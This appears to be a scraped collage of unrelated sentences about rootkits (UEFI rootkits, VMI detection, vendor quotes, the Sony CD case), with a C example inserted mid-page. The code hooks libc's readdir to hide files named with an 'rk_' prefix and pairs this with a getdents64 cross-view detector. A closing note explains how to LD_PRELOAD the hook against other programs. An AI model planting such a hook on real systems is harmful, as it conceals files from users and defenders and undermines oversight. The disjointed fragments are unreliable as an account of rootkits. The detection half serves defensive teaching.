"Although, in theory, we were aware that UEFI rootkits existed, our discovery confirms they are used by an active APT group.
In recent years, researchers have changed the rootkit defense landscape by leveraging recent advances in virtualization, and have proposed virtual machine introspection (VMI) technology to build IDSes [10] [12] [13].
"Recent research shows that seven of the top ten threats in 2012 were rootkits and that the number of boot-level rootkits increased dramatically," said Avishai Ziv, vice president of Cyber Security Solutions at LynuxWorks.
Depending on the level of privilege the attacker has obtained, a rootkit can operate in user space or in kernel space.
The rootkit used was designed specifically to exploit these three features but, according to Vinod Ganapathy and Liviu Iftode, two of the scientists who helped to develop it, this is just the tip of the iceberg.
The only reliable way to cure a rootkit infection is to reinstall the operating system and applications (a firmware-level rootkit of the kind described above survives even that, since it lives outside the disk that is wiped).
Rootkit Detective was developed by Avert(R) Labs, McAfee's top-ranked global security threat and research organization.
Rootkits are malware designed to hide themselves within another application or within the operating system itself.
With a rootkit, that command can be intercepted and false information returned.
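The interception just described, and the user-space mode of operation mentioned earlier, can be shown concretely. The following is an added example, not code from the original page or from any of the products or papers it quotes: a user-space rootkit technique in which a shared object exporting its own readdir(3) shadows libc's and silently drops directory entries, paired with the classic cross-view detection that compares the libc view against the raw getdents64(2) syscall. Linux/glibc is assumed, as are the file-name prefix "rk_" and the /tmp fixture, both of which are hypothetical choices for the demonstration.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE          /* for RTLD_NEXT */
#endif
#include <dirent.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef RTLD_NEXT
#define RTLD_NEXT ((void *) -1l)   /* glibc's value, in case _GNU_SOURCE came too late */
#endif

/* Hypothetical marker: entries whose names start with this prefix are hidden. */
static const char HIDE_PREFIX[] = "rk_";

/* The hook. A symbol named readdir in a preloaded object (or, as in this
 * self-test, in the executable itself) shadows libc's readdir. The real one is
 * reached via RTLD_NEXT and entries matching the prefix are swallowed. */
struct dirent *readdir(DIR *dirp)
{
    static struct dirent *(*real_readdir)(DIR *);
    struct dirent *e;

    if (real_readdir == NULL)
        real_readdir = (struct dirent *(*)(DIR *))dlsym(RTLD_NEXT, "readdir");
    if (real_readdir == NULL)
        return NULL;
    while ((e = real_readdir(dirp)) != NULL) {
        if (strncmp(e->d_name, HIDE_PREFIX, sizeof HIDE_PREFIX - 1) != 0)
            return e;                      /* innocent entry: pass through */
        /* hidden entry: drop it and fetch the next one */
    }
    return NULL;
}

/* View 1: the libc API view, what ls and most tools get (hooked above). */
int count_via_readdir(const char *path)
{
    DIR *d = opendir(path);
    struct dirent *e;
    int n = 0;

    if (d == NULL)
        return -1;
    while ((e = readdir(d)) != NULL)
        if (strcmp(e->d_name, ".") != 0 && strcmp(e->d_name, "..") != 0)
            n++;
    closedir(d);
    return n;
}

/* Record layout written by getdents64(2), as in linux/dirent.h. */
struct raw_dirent64 {
    unsigned long long d_ino;
    long long          d_off;
    unsigned short     d_reclen;
    unsigned char      d_type;
    char               d_name[];
};

/* View 2: the syscall view. Bypasses libc, so a user-space hook cannot filter it.
 * A kernel-level rootkit could still lie here; this only exposes user-space hooks. */
int count_via_getdents(const char *path)
{
    long long storage[1024];               /* 8 KiB, 8-byte aligned for the records */
    char *buf = (char *)storage;
    int fd = open(path, O_RDONLY | O_DIRECTORY);
    int n = 0;

    if (fd < 0)
        return -1;
    for (;;) {
        long got = syscall(SYS_getdents64, fd, buf, sizeof storage);
        if (got <= 0)
            break;
        for (long off = 0; off < got;) {
            struct raw_dirent64 *r = (struct raw_dirent64 *)(buf + off);
            if (strcmp(r->d_name, ".") != 0 && strcmp(r->d_name, "..") != 0)
                n++;
            off += r->d_reclen;
        }
    }
    close(fd);
    return n;
}

/* Cross-view check: a positive difference means entries are hidden from the API. */
int cross_view_discrepancy(const char *path)
{
    int api = count_via_readdir(path), raw = count_via_getdents(path);
    return (api < 0 || raw < 0) ? -1 : raw - api;
}

/* Constructed fixture: a temp directory holding one visible and one "hidden"
 * file. Created on first call; later calls return the same path. */
const char *make_demo_dir(void)
{
    static char path[] = "/tmp/rkdemo.XXXXXX";
    static const char *names[] = { "visible.txt", "rk_hidden.txt" };
    static int ready;

    if (!ready) {
        if (mkdtemp(path) == NULL)
            return NULL;
        for (size_t i = 0; i < 2; i++) {
            char file[64];
            snprintf(file, sizeof file, "%s/%s", path, names[i]);
            int fd = open(file, O_WRONLY | O_CREAT, 0600);
            if (fd < 0)
                return NULL;
            close(fd);
        }
        ready = 1;
    }
    return path;
}

int main(void)
{
    const char *dir = make_demo_dir();
    if (dir == NULL)
        return 1;
    printf("readdir() view:   %d entries\n", count_via_readdir(dir));
    printf("getdents64 view:  %d entries\n", count_via_getdents(dir));
    printf("hidden from API:  %d\n", cross_view_discrepancy(dir));
    return 0;
}
```

To use the hook against other programs rather than the built-in self-test, build only the readdir function as a shared object (gcc -shared -fPIC, adding -ldl on glibc older than 2.34) and run a target with LD_PRELOAD pointing at it; ls will then omit every rk_ entry while the getdents64 count still includes it, which is exactly the discrepancy the cross-view check reports.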
Some days later, during a routine security check on his machine, he found something odd: a bunch of files he identified as a "rootkit".
The technology, which was designed to replace music with static should a user attempt to illegally copy the CD, was also found to secretly install a "rootkit" on PC users' computers (a program frequently used by hackers to gain access to and control a computer system without the user's knowledge).